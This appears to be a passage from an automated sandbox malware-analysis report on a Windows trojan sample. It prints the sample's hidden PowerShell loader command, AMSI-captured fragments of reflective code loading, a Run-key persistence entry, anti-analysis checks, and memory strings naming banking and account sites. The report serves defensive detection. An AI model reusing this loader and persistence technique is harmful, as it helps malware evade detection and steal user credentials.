        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Tilbede $Fremstillede $Halsens), (Bypast @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Presidia152 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Co
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Klovnenumrene)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Vilnis, $false).DefineType($Offentliggrelse
        Obfuscated command line found
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
        Suspicious powershell command line found
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0796CE08 pushfd ; iretd 2_2_0796CFA5
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093B9BDA push edi; retf 2_2_093B9BDB
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093B62BD push ecx; retf 2_2_093B62C3
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093B3EA3 push eax; ret 2_2_093B3EA4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093B7C81 push ebp; ret 2_2_093B7C9F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_093BA6E7 pushfd ; iretd 2_2_093BA6E8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2043225F pushad ; ret 8_2_204327F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204327FA pushad ; ret 8_2_204327F9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2043283D push eax; iretd 8_2_20432858
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204609AD push ecx; mov dword ptr [esp], ecx8_2_204609B6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_016662BD push ecx; retf 8_2_016662C3
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_0166A6E7 pushfd ; iretd 8_2_0166A6E8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_01669BDA push edi; retf 8_2_01669BDB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_01667C81 push ebp; ret 8_2_01667C9F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_01663EA3 push eax; ret 8_2_01663EA4
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031609AD push ecx; mov dword ptr [esp], ecx14_2_031609B6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E0046 push FFFFFF8Ch; iretd 14_2_003E0077
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003D21B0 push esi; retf 14_2_003D21BB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003C8208 push ds; retf 14_2_003C820A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E0270 push edi; iretd 14_2_003E0278
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E0268 push edi; iretd 14_2_003E0278
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003D039F push ss; ret 14_2_003D03C4
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003D03D1 push E16F236Ah; retn 0031h14_2_003D03D6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003D43C0 push edi; retf 14_2_003D43CC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003DCBAE push eax; retf 14_2_003DCBB1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003D4FC8 pushfd ; retf 14_2_003D4FDD
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003DB681 push ebp; ret 14_2_003DB68C
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Overfondle.exeJump to dropped file
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeFile created: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dllJump to dropped file
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HakkebrttetJump to behavior
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HakkebrttetJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E rdtsc 8_2_204A096E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6680Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3072Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 2.4 %
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -9223372036854770s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A19
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004065CE FindFirstFileA,FindClose,0_2_004065CE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004027AA FindFirstFileA,0_2_004027AA
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003DB880 FindFirstFileW,FindNextFileW,FindClose,14_2_003DB880
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: 545Ni1I.14.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
        Source: 545Ni1I.14.drBinary or memory string: tasks.office.comVMware20,11696501413o
        Source: 545Ni1I.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
        Source: Overfondle.exe, 00000008.00000002.2170479484.000000000441A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
        Source: 545Ni1I.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
        Source: 545Ni1I.14.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
        Source: 545Ni1I.14.drBinary or memory string: dev.azure.comVMware20,11696501413j
        Source: 545Ni1I.14.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
        Source: cmd.exe, 0000000E.00000002.2614682827.00000000008E2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
        Source: Overfondle.exe, 00000008.00000002.2170573580.000000000446E000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065800892.000000000446E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: 545Ni1I.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
        Source: 545Ni1I.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
        Source: 545Ni1I.14.drBinary or memory string: bankofamerica.comVMware20,11696501413x
        Source: 545Ni1I.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
        Source: 545Ni1I.14.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
        Source: 545Ni1I.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000002.2615832475.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
        Source: 545Ni1I.14.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
        Source: firefox.exe, 00000011.00000002.2458322940.0000016A1F53C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: 545Ni1I.14.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
        Source: 545Ni1I.14.drBinary or memory string: outlook.office.comVMware20,11696501413s
        Source: 545Ni1I.14.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
        Source: 545Ni1I.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
        Source: 545Ni1I.14.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
        Source: 545Ni1I.14.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
        Source: 545Ni1I.14.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
        Source: 545Ni1I.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
        Source: 545Ni1I.14.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
        Source: 545Ni1I.14.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
        Source: 545Ni1I.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
        Source: 545Ni1I.14.drBinary or memory string: global block list test formVMware20,11696501413
        Source: 545Ni1I.14.drBinary or memory string: outlook.office365.comVMware20,11696501413t
        Source: 545Ni1I.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
        Source: 545Ni1I.14.drBinary or memory string: interactiveuserers.comVMware20,11696501413
        Source: 545Ni1I.14.drBinary or memory string: discord.comVMware20,11696501413f
        Source: 545Ni1I.14.drBinary or memory string: AMC password management pageVMware20,11696501413
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeAPI call chain: ExitProcess graph end nodegraph_0-3441
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeAPI call chain: ExitProcess graph end nodegraph_0-3591
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A096E rdtsc 8_2_204A096E
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0333D7B8 LdrInitializeThunk,2_2_0333D7B8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20462050 mov eax, dword ptr fs:[00000030h]8_2_20462050
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E6050 mov eax, dword ptr fs:[00000030h]8_2_204E6050
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048C073 mov eax, dword ptr fs:[00000030h]8_2_2048C073
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20502000 mov eax, dword ptr fs:[00000030h]8_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h]8_2_2047E016
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h]8_2_2047E016
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h]8_2_2047E016
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E016 mov eax, dword ptr fs:[00000030h]8_2_2047E016
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045A020 mov eax, dword ptr fs:[00000030h]8_2_2045A020
